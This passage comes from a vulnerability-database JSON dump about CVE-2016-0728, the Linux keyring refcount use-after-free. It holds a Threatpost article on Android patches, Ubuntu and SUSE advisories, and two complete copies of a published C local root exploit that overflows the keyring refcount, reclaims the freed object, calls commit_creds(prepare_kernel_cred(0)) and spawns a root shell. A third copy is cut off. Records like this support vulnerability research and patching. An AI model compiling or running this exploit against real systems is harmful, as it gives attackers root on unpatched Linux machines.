\u201cDuring media file and data processing of a specially crafted file, vulnerabilities in Mediaserver could allow an attacker to cause memory corruption and remote code execution as the Mediaserver process,\u201d wrote Google in its bulletin.\n\nAlong with the Mediaserver vulnerabilities (CVE-2016-0815 and CVE-2016-0816), Google identified a third Libvpx critical vulnerability (CVE-2016-1621) that\u2019s also susceptible to remote code execution.\n\n\u201cOn one hand, this type of functionality (Mediaserver) is known to have vulnerabilities. But knowing that, Google could do a much better job isolating this type of risky attack surface as well as making sure that the Mediaserver can be updated in an expedient manner,\u201d said Jon Oberheide, co-founder and CTO, Duo Security. \u201cWireless carriers are notoriously slow when it comes to these type of out-of-band patches,\u201d he said.\n\nGoogle said Nexus device owners need to update Nexus firmware Builds LMY49H and later, and Android Marshmallow. Alternatively, Android users can check the firmware version on their devices to see if the updates have been applied along with verifying the date the latest Android security patch was installed.\n\nAs part of Google\u2019s remediation efforts, it said the Android Security team is actively monitoring for abuse with Verify Apps and SafetyNet which both warn users of potentially harmful applications about to be installed. Google said it was unaware of any attempts to exploit the listed vulnerabilities.\n\nGoogle also said it was releasing patches for a critical privilege elevation vulnerability in the Android kernel. 
Vulnerabilities identified are a Conscrypt (CVE-2016-0818) and weaknesses found inside a Qualcomm performance component (CVE-2016-0819) and MediaTek\u2019s Wi-Fi driver (CVE-2016-0820) and in device\u2019s keyring component (CVE-2016-0728).\n", "modified": "2016-03-07T17:16:54", "published": "2016-03-07T14:00:02", "id": "THREATPOST:45807D1856E34DEFF51A771D0E730AA3", "href": "https://threatpost.com/google-fixes-critical-android-mediaserver-bugs-again/116614/", "type": "threatpost", "title": "Google Fixes Critical Mediaserver Bug, Again", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-02T11:37:36", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "Yevgeny Pats discovered that the session keyring implementation in the \nLinux kernel did not properly reference count when joining an existing \nsession keyring. A local attacker could use this to cause a denial of \nservice (system crash) or possibly execute arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-01-19T00:00:00", "published": "2016-01-19T00:00:00", "id": "USN-2872-2", "href": "https://ubuntu.com/security/notices/USN-2872-2", "title": "Linux kernel (Wily HWE) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:45:16", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "Yevgeny Pats discovered that the session keyring implementation in the \nLinux kernel did not properly reference count when joining an existing \nsession keyring. 
A local attacker could use this to cause a denial of \nservice (system crash) or possibly execute arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-01-19T00:00:00", "published": "2016-01-19T00:00:00", "id": "USN-2873-1", "href": "https://ubuntu.com/security/notices/USN-2873-1", "title": "Linux kernel (Utopic HWE) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:34:54", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "Yevgeny Pats discovered that the session keyring implementation in the \nLinux kernel did not properly reference count when joining an existing \nsession keyring. A local attacker could use this to cause a denial of \nservice (system crash) or possibly execute arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-01-19T00:00:00", "published": "2016-01-19T00:00:00", "id": "USN-2871-1", "href": "https://ubuntu.com/security/notices/USN-2871-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-08T23:41:59", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "Yevgeny Pats discovered that the session keyring implementation in the \nLinux kernel did not properly reference count when joining an existing \nsession keyring. 
A local attacker could use this to cause a denial of \nservice (system crash) or possibly execute arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-01-19T00:00:00", "published": "2016-01-19T00:00:00", "id": "USN-2872-3", "href": "https://ubuntu.com/security/notices/USN-2872-3", "title": "Linux kernel (Raspberry Pi 2) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:45:19", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "Yevgeny Pats discovered that the session keyring implementation in the \nLinux kernel did not properly reference count when joining an existing \nsession keyring. A local attacker could use this to cause a denial of \nservice (system crash) or possibly execute arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-01-19T00:00:00", "published": "2016-01-19T00:00:00", "id": "USN-2870-1", "href": "https://ubuntu.com/security/notices/USN-2870-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:38:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "Yevgeny Pats discovered that the session keyring implementation in the \nLinux kernel did not properly reference count when joining an existing \nsession keyring. 
A local attacker could use this to cause a denial of \nservice (system crash) or possibly execute arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-01-19T00:00:00", "published": "2016-01-19T00:00:00", "id": "USN-2870-2", "href": "https://ubuntu.com/security/notices/USN-2870-2", "title": "Linux kernel (Trusty HWE) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:44:04", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "Yevgeny Pats discovered that the session keyring implementation in the \nLinux kernel did not properly reference count when joining an existing \nsession keyring. A local attacker could use this to cause a denial of \nservice (system crash) or possibly execute arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-01-19T00:00:00", "published": "2016-01-19T00:00:00", "id": "USN-2871-2", "href": "https://ubuntu.com/security/notices/USN-2871-2", "title": "Linux kernel (Vivid HWE) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-08T23:37:39", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "Yevgeny Pats discovered that the session keyring implementation in the \nLinux kernel did not properly reference count when joining an existing \nsession keyring. 
A local attacker could use this to cause a denial of \nservice (system crash) or possibly execute arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-01-19T00:00:00", "published": "2016-01-19T00:00:00", "id": "USN-2872-1", "href": "https://ubuntu.com/security/notices/USN-2872-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-03-13T23:14:27", "description": "Exploit for linux platform in category local exploits", "edition": 2, "published": "2016-01-19T00:00:00", "type": "zdt", "title": "Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Privilege Escalation (2)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-19T00:00:00", "id": "1337DAY-ID-25517", "href": "https://0day.today/exploit/description/25517", "sourceData": "/*\r\n# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings\r\n# Date: 19/1/2016\r\n# Exploit Author: Perception Point Team\r\n# CVE : CVE-2016-0728\r\n*/\r\n \r\n/* CVE-2016-0728 local root exploit\r\n modified by Federico Bento to read kernel symbols from /proc/kallsyms\r\n props to grsecurity/PaX for preventing this in so many ways\r\n \r\n $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall\r\n $ ./cve_2016_072 PP_KEY */\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <keyutils.h>\r\n#include <unistd.h>\r\n#include <time.h>\r\n#include <unistd.h>\r\n \r\n#include <sys/ipc.h>\r\n#include <sys/msg.h>\r\n \r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\n \r\n#define STRUCT_LEN (0xb8 - 0x30)\r\n#define COMMIT_CREDS_ADDR (0xffffffff810bb050)\r\n#define PREPARE_KERNEL_CREDS_ADDR 
(0xffffffff810bb370)\r\n \r\n \r\n \r\nstruct key_type {\r\n char * name;\r\n size_t datalen;\r\n void * vet_description;\r\n void * preparse;\r\n void * free_preparse;\r\n void * instantiate;\r\n void * update;\r\n void * match_preparse;\r\n void * match_free;\r\n void * revoke;\r\n void * destroy;\r\n};\r\n \r\n/* thanks spender - Federico Bento */\r\nstatic unsigned long get_kernel_sym(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy;\r\n char sname[256];\r\n int ret;\r\n \r\n f = fopen(\"/proc/kallsyms\", \"r\");\r\n if (f == NULL) {\r\n fprintf(stdout, \"Unable to obtain symbol listing!\\n\");\r\n exit(0);\r\n }\r\n \r\n ret = 0;\r\n while(ret != EOF) {\r\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n if (ret == 0) {\r\n fscanf(f, \"%s\\n\", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fprintf(stdout, \"[+] Resolved %s to %p\\n\", name, (void *)addr);\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n \r\n fclose(f);\r\n return 0;\r\n}\r\n \r\nvoid userspace_revoke(void * key) {\r\n commit_creds(prepare_kernel_cred(0));\r\n}\r\n \r\nint main(int argc, const char *argv[]) {\r\n const char *keyring_name;\r\n size_t i = 0;\r\n unsigned long int l = 0x100000000/2;\r\n key_serial_t serial = -1;\r\n pid_t pid = -1;\r\n struct key_type * my_key_type = NULL;\r\n \r\n struct {\r\n long mtype;\r\n char mtext[STRUCT_LEN];\r\n } msg = {0x4141414141414141, {0}};\r\n int msqid;\r\n \r\n if (argc != 2) {\r\n puts(\"usage: ./keys <key_name>\");\r\n return 1;\r\n }\r\n \r\n printf(\"[+] uid=%d, euid=%d\\n\", getuid(), geteuid());\r\n commit_creds = (_commit_creds)get_kernel_sym(\"commit_creds\");\r\n prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym(\"prepare_kernel_cred\");\r\n if(commit_creds == NULL || prepare_kernel_cred == NULL) {\r\n commit_creds = (_commit_creds)COMMIT_CREDS_ADDR;\r\n prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR;\r\n if(commit_creds == 
(_commit_creds)0xffffffff810bb050 || prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370)\r\n puts(\"[-] You probably need to change the address of commit_creds and prepare_kernel_cred in source\");\r\n }\r\n \r\n my_key_type = malloc(sizeof(*my_key_type));\r\n \r\n my_key_type->revoke = (void*)userspace_revoke;\r\n memset(msg.mtext, 'A', sizeof(msg.mtext));\r\n \r\n // key->uid\r\n *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */\r\n //key->perm\r\n *(int*)(&msg.mtext[64]) = 0x3f3f3f3f;\r\n \r\n //key->type\r\n *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;\r\n \r\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\r\n perror(\"msgget\");\r\n exit(1);\r\n }\r\n \r\n keyring_name = argv[1];\r\n \r\n /* Set the new session keyring before we start */\r\n \r\n serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);\r\n if (serial < 0) {\r\n perror(\"keyctl\");\r\n return -1;\r\n }\r\n \r\n if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {\r\n perror(\"keyctl\");\r\n return -1;\r\n }\r\n \r\n \r\n puts(\"[+] Increfing...\");\r\n for (i = 1; i < 0xfffffffd; i++) {\r\n if (i == (0xffffffff - l)) {\r\n l = l/2;\r\n sleep(5);\r\n }\r\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\r\n perror(\"[-] keyctl\");\r\n return -1;\r\n }\r\n }\r\n sleep(5);\r\n /* here we are going to leak the last references to overflow */\r\n for (i=0; i<5; ++i) {\r\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\r\n perror(\"[-] keyctl\");\r\n return -1;\r\n }\r\n }\r\n \r\n puts(\"[+] Finished increfing\");\r\n puts(\"[+] Forking...\");\r\n /* allocate msg struct in the kernel rewriting the freed keyring object */\r\n for (i=0; i<64; i++) {\r\n pid = fork();\r\n if (pid == -1) {\r\n perror(\"[-] fork\");\r\n return -1;\r\n }\r\n \r\n if (pid == 0) {\r\n sleep(2);\r\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\r\n perror(\"[-] msgget\");\r\n exit(1);\r\n 
}\r\n for (i = 0; i < 64; i++) {\r\n if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {\r\n perror(\"[-] msgsnd\");\r\n exit(1);\r\n }\r\n }\r\n sleep(-1);\r\n exit(1);\r\n }\r\n }\r\n \r\n puts(\"[+] Finished forking\");\r\n sleep(5);\r\n \r\n /* call userspace_revoke from kernel */\r\n puts(\"[+] Caling revoke...\");\r\n if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {\r\n perror(\"[+] keyctl_revoke\");\r\n }\r\n \r\n printf(\"uid=%d, euid=%d\\n\", getuid(), geteuid());\r\n execl(\"/bin/sh\", \"/bin/sh\", NULL);\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25517"}, {"lastseen": "2018-03-19T11:04:11", "description": "Exploit for linux platform in category local exploits", "edition": 2, "published": "2016-01-19T00:00:00", "type": "zdt", "title": "Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Privilege Escalation (1)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-19T00:00:00", "id": "1337DAY-ID-25516", "href": "https://0day.today/exploit/description/25516", "sourceData": "/*\r\n# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings\r\n# Date: 19/1/2016\r\n# Exploit Author: Perception Point Team\r\n# CVE : CVE-2016-0728\r\n*/\r\n \r\n/* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */\r\n/* $ ./cve_2016_072 PP_KEY */\r\n \r\n/* EDB-Note: More information ~ http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/ */\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <keyutils.h>\r\n#include <unistd.h>\r\n#include <time.h>\r\n#include <unistd.h>\r\n \r\n#include <sys/ipc.h>\r\n#include <sys/msg.h>\r\n \r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long 
__attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\n \r\n#define STRUCT_LEN (0xb8 - 0x30)\r\n#define COMMIT_CREDS_ADDR (0xffffffff81094250)\r\n#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff81094550)\r\n \r\n \r\n \r\nstruct key_type {\r\n char * name;\r\n size_t datalen;\r\n void * vet_description;\r\n void * preparse;\r\n void * free_preparse;\r\n void * instantiate;\r\n void * update;\r\n void * match_preparse;\r\n void * match_free;\r\n void * revoke;\r\n void * destroy;\r\n};\r\n \r\nvoid userspace_revoke(void * key) {\r\n commit_creds(prepare_kernel_cred(0));\r\n}\r\n \r\nint main(int argc, const char *argv[]) {\r\n const char *keyring_name;\r\n size_t i = 0;\r\n unsigned long int l = 0x100000000/2;\r\n key_serial_t serial = -1;\r\n pid_t pid = -1;\r\n struct key_type * my_key_type = NULL;\r\n \r\nstruct { long mtype;\r\n char mtext[STRUCT_LEN];\r\n } msg = {0x4141414141414141, {0}};\r\n int msqid;\r\n \r\n if (argc != 2) {\r\n puts(\"usage: ./keys <key_name>\");\r\n return 1;\r\n }\r\n \r\n printf(\"uid=%d, euid=%d\\n\", getuid(), geteuid()); \r\n commit_creds = (_commit_creds) COMMIT_CREDS_ADDR;\r\n prepare_kernel_cred = (_prepare_kernel_cred) PREPARE_KERNEL_CREDS_ADDR;\r\n \r\n my_key_type = malloc(sizeof(*my_key_type));\r\n \r\n my_key_type->revoke = (void*)userspace_revoke;\r\n memset(msg.mtext, 'A', sizeof(msg.mtext));\r\n \r\n // key->uid\r\n *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */\r\n //key->perm\r\n *(int*)(&msg.mtext[64]) = 0x3f3f3f3f;\r\n \r\n //key->type\r\n *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;\r\n \r\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\r\n perror(\"msgget\");\r\n exit(1);\r\n }\r\n \r\n keyring_name = argv[1];\r\n \r\n /* Set the new session keyring before we start */\r\n \r\n serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);\r\n if (serial < 0) {\r\n perror(\"keyctl\");\r\n 
return -1;\r\n }\r\n \r\n if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {\r\n perror(\"keyctl\");\r\n return -1;\r\n }\r\n \r\n \r\n puts(\"Increfing...\");\r\n for (i = 1; i < 0xfffffffd; i++) {\r\n if (i == (0xffffffff - l)) {\r\n l = l/2;\r\n sleep(5);\r\n }\r\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\r\n perror(\"keyctl\");\r\n return -1;\r\n }\r\n }\r\n sleep(5);\r\n /* here we are going to leak the last references to overflow */\r\n for (i=0; i<5; ++i) {\r\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\r\n perror(\"keyctl\");\r\n return -1;\r\n }\r\n }\r\n \r\n puts(\"finished increfing\");\r\n puts(\"forking...\");\r\n /* allocate msg struct in the kernel rewriting the freed keyring object */\r\n for (i=0; i<64; i++) {\r\n pid = fork();\r\n if (pid == -1) {\r\n perror(\"fork\");\r\n return -1;\r\n }\r\n \r\n if (pid == 0) {\r\n sleep(2);\r\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\r\n perror(\"msgget\");\r\n exit(1);\r\n }\r\n for (i = 0; i < 64; i++) {\r\n if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {\r\n perror(\"msgsnd\");\r\n exit(1);\r\n }\r\n }\r\n sleep(-1);\r\n exit(1);\r\n }\r\n }\r\n \r\n puts(\"finished forking\");\r\n sleep(5);\r\n \r\n /* call userspace_revoke from kernel */\r\n puts(\"caling revoke...\");\r\n if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {\r\n perror(\"keyctl_revoke\");\r\n }\r\n \r\n printf(\"uid=%d, euid=%d\\n\", getuid(), geteuid());\r\n execl(\"/bin/sh\", \"/bin/sh\", NULL);\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25516"}], "suse": [{"lastseen": "2016-09-04T12:25:39", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "The SUSE Linux Enterprise 12 SP1 kernel was updated to receive a security\n fix.\n\n Following security bug 
was fixed:\n - A reference leak in keyring handling with join_session_keyring() could\n lead to local attackers gain root privileges. (bsc#962075,\n CVE-2016-0728).\n\n", "edition": 1, "modified": "2016-01-20T21:11:28", "published": "2016-01-20T21:11:28", "id": "SUSE-SU-2016:0186-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00021.html", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:40:04", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "The SUSE Linux Enterprise 12 kernel was updated to receive a security fix.\n\n Following security bug was fixed:\n - A reference leak in keyring handling with join_session_keyring() could\n lead to local attackers gain root privileges. (bsc#962075,\n CVE-2016-0728).\n\n", "edition": 1, "modified": "2016-01-22T18:12:30", "published": "2016-01-22T18:12:30", "id": "SUSE-SU-2016:0205-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00026.html", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:14:55", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "This kernel live patch for Linux Kernel 3.12.51-52.34.1 fixes one security\n issue:\n\n - A reference leak in keyring handling with join_session_keyring() could\n lead to local attackers gain root privileges. 
(bsc#962075,\n CVE-2016-0728).\n\n", "edition": 1, "modified": "2016-02-04T19:18:40", "published": "2016-02-04T19:18:40", "id": "SUSE-SU-2016:0341-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-02/msg00012.html", "type": "suse", "title": "Security update for Kernel live patch 10 (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:45:49", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728", "CVE-2013-7446"], "description": "This kernel live patch for Linux Kernel 3.12.48-52.27.1 fixes two security\n issues:\n\n Fixes:\n - CVE-2016-0728: A reference leak in keyring handling with\n join_session_keyring() could lead to local attackers gain root\n privileges. (bsc#962078).\n - CVE-2013-7446: Use-after-free vulnerability in net/unix/af_unix.c in the\n Linux kernel allowed local users to bypass intended AF_UNIX socket\n permissions or cause a denial of service (panic) via crafted epoll_ctl\n calls. (bsc#955837)\n\n", "edition": 1, "modified": "2016-03-14T18:19:06", "published": "2016-03-14T18:19:06", "id": "SUSE-SU-2016:0757-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00045.html", "type": "suse", "title": "Security update for kernel live patch 8 (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:10:59", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728", "CVE-2013-7446"], "description": "This kernel live patch for Linux Kernel 3.12.51-52.31.1 fixes two security\n issues:\n\n Fixes:\n - CVE-2016-0728: A reference leak in keyring handling with\n join_session_keyring() could lead to local attackers gain root\n privileges. 
(bsc#962078).\n - CVE-2013-7446: Use-after-free vulnerability in net/unix/af_unix.c in the\n Linux kernel allowed local users to bypass intended AF_UNIX socket\n permissions or cause a denial of service (panic) via crafted epoll_ctl\n calls. (bsc#955837)\n\n", "edition": 1, "modified": "2016-03-14T18:13:01", "published": "2016-03-14T18:13:01", "id": "SUSE-SU-2016:0747-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00035.html", "type": "suse", "title": "Security update for kernel live patch 9 (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:42:10", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728", "CVE-2013-7446"], "description": "This kernel live patch for Linux Kernel 3.12.44-52.10.1 fixes two security\n issues:\n\n Fixes:\n - CVE-2016-0728: A reference leak in keyring handling with\n join_session_keyring() could lead to local attackers gain root\n privileges. (bsc#962078).\n - CVE-2013-7446: Use-after-free vulnerability in net/unix/af_unix.c in the\n Linux kernel allowed local users to bypass intended AF_UNIX socket\n permissions or cause a denial of service (panic) via crafted epoll_ctl\n calls. (bsc#955837)\n\n", "edition": 1, "modified": "2016-03-14T18:16:48", "published": "2016-03-14T18:16:48", "id": "SUSE-SU-2016:0753-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00041.html", "title": "Security update for kernel live patch 6 (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:49:45", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728", "CVE-2013-7446"], "description": "This kernel live patch for Linux Kernel 3.12.39-47.1 fixes two security\n issues:\n\n Fixes:\n - CVE-2016-0728: A reference leak in keyring handling with\n join_session_keyring() could lead to local attackers gain root\n privileges. 
(bsc#962078).\n - CVE-2013-7446: Use-after-free vulnerability in net/unix/af_unix.c in the\n Linux kernel allowed local users to bypass intended AF_UNIX socket\n permissions or cause a denial of service (panic) via crafted epoll_ctl\n calls. (bsc#955837)\n\n", "edition": 1, "modified": "2016-03-14T18:12:19", "published": "2016-03-14T18:12:19", "id": "SUSE-SU-2016:0746-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00034.html", "type": "suse", "title": "Security update for kernel live patch 4 (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:22:57", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728", "CVE-2013-7446"], "edition": 1, "description": "This kernel live patch for Linux Kernel 3.12.38-44.1 fixes two security\n issues:\n\n Fixes:\n - CVE-2016-0728: A reference leak in keyring handling with\n join_session_keyring() could lead to local attackers gain root\n privileges. (bsc#962078).\n - CVE-2013-7446: Use-after-free vulnerability in net/unix/af_unix.c in the\n Linux kernel allowed local users to bypass intended AF_UNIX socket\n permissions or cause a denial of service (panic) via crafted epoll_ctl\n calls. (bsc#955837)\n\n", "modified": "2016-03-14T18:11:49", "published": "2016-03-14T18:11:49", "id": "SUSE-SU-2016:0745-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00033.html", "type": "suse", "title": "Security update for kernel live patch 3 (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:25:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728", "CVE-2013-7446"], "description": "This kernel live patch for Linux Kernel 3.12.44-52.18.1 fixes two security\n issues:\n\n Fixes:\n - CVE-2016-0728: A reference leak in keyring handling with\n join_session_keyring() could lead to local attackers gain root\n privileges. 
(bsc#962078).\n - CVE-2013-7446: Use-after-free vulnerability in net/unix/af_unix.c in the\n Linux kernel allowed local users to bypass intended AF_UNIX socket\n permissions or cause a denial of service (panic) via crafted epoll_ctl\n calls. (bsc#955837)\n\n", "edition": 1, "modified": "2016-03-14T18:18:29", "published": "2016-03-14T18:18:29", "id": "SUSE-SU-2016:0756-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00044.html", "title": "Security update for kernel live patch 7 (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:18:27", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728", "CVE-2013-7446"], "description": "This kernel live patch for Linux Kernel 3.12.43-52.6.1 fixes two security\n issues:\n\n Fixes:\n - CVE-2016-0728: A reference leak in keyring handling with\n join_session_keyring() could lead to local attackers gain root\n privileges. (bsc#962078).\n - CVE-2013-7446: Use-after-free vulnerability in net/unix/af_unix.c in the\n Linux kernel allowed local users to bypass intended AF_UNIX socket\n permissions or cause a denial of service (panic) via crafted epoll_ctl\n calls. 
(bsc#955837)\n\n", "edition": 1, "modified": "2016-03-14T18:14:18", "published": "2016-03-14T18:14:18", "id": "SUSE-SU-2016:0750-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00038.html", "title": "Security update for kernel live patch 5 (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (2)", "edition": 1, "published": "2016-01-19T00:00:00", "title": "Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (2)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-19T00:00:00", "id": "EXPLOITPACK:3459535A8A480A3A2F164DB01F4CF994", "href": "", "sourceData": "/*\n# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings\n# Date: 19/1/2016\n# Exploit Author: Perception Point Team\n# 